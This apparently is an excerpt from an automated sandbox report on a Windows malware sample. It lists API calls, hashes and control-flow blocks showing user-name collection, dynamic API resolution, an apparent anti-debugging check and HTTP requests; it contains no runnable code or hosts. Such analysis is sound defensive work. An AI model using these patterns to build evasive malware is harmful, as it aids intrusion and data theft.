                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                  • API String ID: 2127927946-2218711628
                                                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                  • String ID:
                                                                                  • API String ID: 1206570057-0
                                                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitInfoProcessSystem
                                                                                  • String ID:
                                                                                  • API String ID: 752954902-0
                                                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                                                  Control-flow Graph

                                                                                  Rendered graph not reproduced; the executed/not-executed colouring is not preserved. Basic blocks (node: address range, API calls -> successors):
                                                                                  • 633: 419c10-419c1a -> 634, 635
                                                                                  • 634: 419c20-41a031, GetProcAddress * 43 -> 635
                                                                                  • 635: 41a036-41a0ca, LoadLibraryA * 8 -> 636, 637
                                                                                  • 636: 41a146-41a14d -> 638, 639
                                                                                  • 637: 41a0cc-41a141, GetProcAddress * 5 -> 636
                                                                                  • 638: 41a153-41a211, GetProcAddress * 8 -> 639
                                                                                  • 639: 41a216-41a21d -> 640, 641
                                                                                  • 640: 41a298-41a29f -> 642, 643
                                                                                  • 641: 41a21f-41a293, GetProcAddress * 5 -> 640
                                                                                  • 642: 41a2a5-41a332, GetProcAddress * 6 -> 643
                                                                                  • 643: 41a337-41a33e -> 644, 645
                                                                                  • 644: 41a344-41a41a, GetProcAddress * 9 -> 645
                                                                                  • 645: 41a41f-41a426 -> 646, 647
                                                                                  • 646: 41a4a2-41a4a9 -> 648, 649
                                                                                  • 647: 41a428-41a49d, GetProcAddress * 5 -> 646
                                                                                  • 648: 41a4ab-41a4d7, GetProcAddress * 2 -> 649
                                                                                  • 649: 41a4dc-41a4e3 -> 650, 651
                                                                                  • 650: 41a515-41a51c -> 652, 653
                                                                                  • 651: 41a4e5-41a510, GetProcAddress * 2 -> 650
                                                                                  • 652: 41a612-41a619 -> 654, 655
                                                                                  • 653: 41a522-41a60d, GetProcAddress * 10 -> 652
                                                                                  • 654: 41a61b-41a678, GetProcAddress * 4 -> 655
                                                                                  • 655: 41a67d-41a684 -> 656, 657
                                                                                  • 656: 41a686-41a699, GetProcAddress -> 657
                                                                                  • 657: 41a69e-41a6a5 -> 658, 659
                                                                                  • 658: 41a6a7-41a703, GetProcAddress * 4 -> 659
                                                                                  • 659: 41a708-41a709
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2EF0), ref: 00419C2D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E50), ref: 00419C45
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CA0), ref: 00419C5E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CB8), ref: 00419C76
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EF8), ref: 00419C8E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EB0), ref: 00419CA7
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D62B0), ref: 00419CBF
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EC8), ref: 00419CD7
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905F10), ref: 00419CF0
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905EE0), ref: 00419D08
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905F28), ref: 00419D20
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2D90), ref: 00419D39
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F10), ref: 00419D51
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DF0), ref: 00419D69
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DD0), ref: 00419D82
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E68), ref: 00419D9A
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E98), ref: 00419DB2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D5F68), ref: 00419DCB
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E10), ref: 00419DE3
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E80), ref: 00419DFB
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909758), ref: 00419E14
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909548), ref: 00419E2C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909560), ref: 00419E44
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2E70), ref: 00419E5D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909578), ref: 00419E75
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909590), ref: 00419E8D
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909788), ref: 00419EA6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909740), ref: 00419EBE
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094B8), ref: 00419ED6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009095A8), ref: 00419EEF
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009095C0), ref: 00419F07
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094D0), ref: 00419F1F
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094E8), ref: 00419F38
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D5000), ref: 00419F50
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909530), ref: 00419F68
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909500), ref: 00419F81
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F30), ref: 00419F99
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009094A0), ref: 00419FB1
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2F70), ref: 00419FCA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,009096B0), ref: 00419FE2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00909518), ref: 00419FFA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2FD0), ref: 0041A013
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2BB0), ref: 0041A02B
                                                                                  • LoadLibraryA.KERNEL32(00909608,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                                                  • LoadLibraryA.KERNEL32(009096E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                                                  • LoadLibraryA.KERNEL32(009095D8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                                                  • LoadLibraryA.KERNEL32(009095F0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                                                  • LoadLibraryA.KERNEL32(00909620,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                                                  • LoadLibraryA.KERNEL32(00909770,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                                                  • LoadLibraryA.KERNEL32(00909680,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                                                  • LoadLibraryA.KERNEL32(00909638,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                                                  • GetProcAddress.KERNEL32(75290000,008D2B30), ref: 0041A0DA
                                                                                  • GetProcAddress.KERNEL32(75290000,00909650), ref: 0041A0F2
                                                                                  • GetProcAddress.KERNEL32(75290000,00906070), ref: 0041A10A
                                                                                  • GetProcAddress.KERNEL32(75290000,00909668), ref: 0041A123
                                                                                  • GetProcAddress.KERNEL32(75290000,008D2C70), ref: 0041A13B
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D5F90), ref: 0041A160
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2BF0), ref: 0041A179
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D5FE0), ref: 0041A191
                                                                                  • GetProcAddress.KERNEL32(734C0000,009096C8), ref: 0041A1A9
                                                                                  • GetProcAddress.KERNEL32(734C0000,00909698), ref: 0041A1C2
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2C50), ref: 0041A1DA
                                                                                  • GetProcAddress.KERNEL32(734C0000,008D2AF0), ref: 0041A1F2
                                                                                  • GetProcAddress.KERNEL32(734C0000,009096F8), ref: 0041A20B
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D29D0), ref: 0041A22C
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D2B10), ref: 0041A244
                                                                                  • GetProcAddress.KERNEL32(752C0000,00909710), ref: 0041A25D
                                                                                  • GetProcAddress.KERNEL32(752C0000,00909728), ref: 0041A275
                                                                                  • GetProcAddress.KERNEL32(752C0000,008D2A30), ref: 0041A28D
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D61C0), ref: 0041A2B3
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D62D8), ref: 0041A2CB
                                                                                  • GetProcAddress.KERNEL32(74EC0000,00909848), ref: 0041A2E3
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D2A50), ref: 0041A2FC
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D2AD0), ref: 0041A314
                                                                                  • GetProcAddress.KERNEL32(74EC0000,008D6008), ref: 0041A32C
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009097E8), ref: 0041A352
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D29F0), ref: 0041A36A
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009060D0), ref: 0041A382
                                                                                  • GetProcAddress.KERNEL32(75BD0000,009097A0), ref: 0041A39B
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909800), ref: 0041A3B3
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D2B50), ref: 0041A3CB
                                                                                  • GetProcAddress.KERNEL32(75BD0000,008D2950), ref: 0041A3E4
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909818), ref: 0041A3FC
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00909860), ref: 0041A414
                                                                                  • GetProcAddress.KERNEL32(75A70000,008D2B70), ref: 0041A436
                                                                                  • GetProcAddress.KERNEL32(75A70000,009097B8), ref: 0041A44E
                                                                                  • GetProcAddress.KERNEL32(75A70000,009097D0), ref: 0041A466
                                                                                  • GetProcAddress.KERNEL32(75A70000,00909830), ref: 0041A47F
                                                                                  • GetProcAddress.KERNEL32(75A70000,00909D88), ref: 0041A497
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2C90), ref: 0041A4B8
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2B90), ref: 0041A4D1
                                                                                  • GetProcAddress.KERNEL32(75DA0000,008D2910), ref: 0041A4F2
                                                                                  • GetProcAddress.KERNEL32(75DA0000,00909E60), ref: 0041A50A
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2930), ref: 0041A530
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2C30), ref: 0041A548
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2970), ref: 0041A560
                                                                                  • GetProcAddress.KERNEL32(6F070000,00909D70), ref: 0041A579
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2990), ref: 0041A591
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D29B0), ref: 0041A5A9
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2BD0), ref: 0041A5C2
                                                                                  • GetProcAddress.KERNEL32(6F070000,008D2C10), ref: 0041A5DA
                                                                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                                                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909C50), ref: 0041A629
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00906040), ref: 0041A641
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909E48), ref: 0041A659
                                                                                  • GetProcAddress.KERNEL32(75AF0000,00909DE8), ref: 0041A672
                                                                                  • GetProcAddress.KERNEL32(75D90000,008D2CB0), ref: 0041A693
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909BC0), ref: 0041A6B4
                                                                                  • GetProcAddress.KERNEL32(6F880000,008D2A10), ref: 0041A6CD
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909C38), ref: 0041A6E5
                                                                                  • GetProcAddress.KERNEL32(6F880000,00909E90), ref: 0041A6FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                  • API String ID: 2238633743-1775429166
                                                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D7FD8), ref: 004198A1
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8038), ref: 004198BA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8068), ref: 004198D2
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D8098), ref: 004198EA
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D80B0), ref: 00419903
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00904578), ref: 0041991B
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3010), ref: 00419933
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2FF0), ref: 0041994C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D80F8), ref: 00419964
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D90), ref: 0041997C
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D60), ref: 00419995
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905B68), ref: 004199AD
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2DB0), ref: 004199C5
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CE8), ref: 004199DE
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905E50), ref: 004199F6
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D2D50), ref: 00419A0E
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905D00), ref: 00419A27
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905C28), ref: 00419A3F
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3030), ref: 00419A57
                                                                                  • GetProcAddress.KERNEL32(74DD0000,00905CD0), ref: 00419A70
                                                                                  • GetProcAddress.KERNEL32(74DD0000,008D3050), ref: 00419A88
                                                                                  • LoadLibraryA.KERNEL32(00905D18,?,00416A00), ref: 00419A9A
                                                                                  • LoadLibraryA.KERNEL32(00905C88,?,00416A00), ref: 00419AAB
                                                                                  • LoadLibraryA.KERNEL32(00905BE0,?,00416A00), ref: 00419ABD
                                                                                  • LoadLibraryA.KERNEL32(00905D78,?,00416A00), ref: 00419ACF
                                                                                  • LoadLibraryA.KERNEL32(00905DD8,?,00416A00), ref: 00419AE0
                                                                                  • GetProcAddress.KERNEL32(75A70000,00905D30), ref: 00419B02
                                                                                  • GetProcAddress.KERNEL32(75290000,00905DF0), ref: 00419B23
                                                                                  • GetProcAddress.KERNEL32(75290000,00905B80), ref: 00419B3B
                                                                                  • GetProcAddress.KERNEL32(75BD0000,00905BB0), ref: 00419B5D
                                                                                  • GetProcAddress.KERNEL32(75450000,008D2ED0), ref: 00419B7E
                                                                                  • GetProcAddress.KERNEL32(76E90000,00904598), ref: 00419B9F
                                                                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                                                                  Strings
                                                                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: NtQueryInformationProcess
                                                                                  • API String ID: 2238633743-2781105232
                                                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                  • String ID: ERROR$ERROR$GET
                                                                                  • API String ID: 3074848878-2509457195
                                                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcessstrtok_s
                                                                                  • String ID: block
                                                                                  • API String ID: 3407564107-2199623458
                                                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
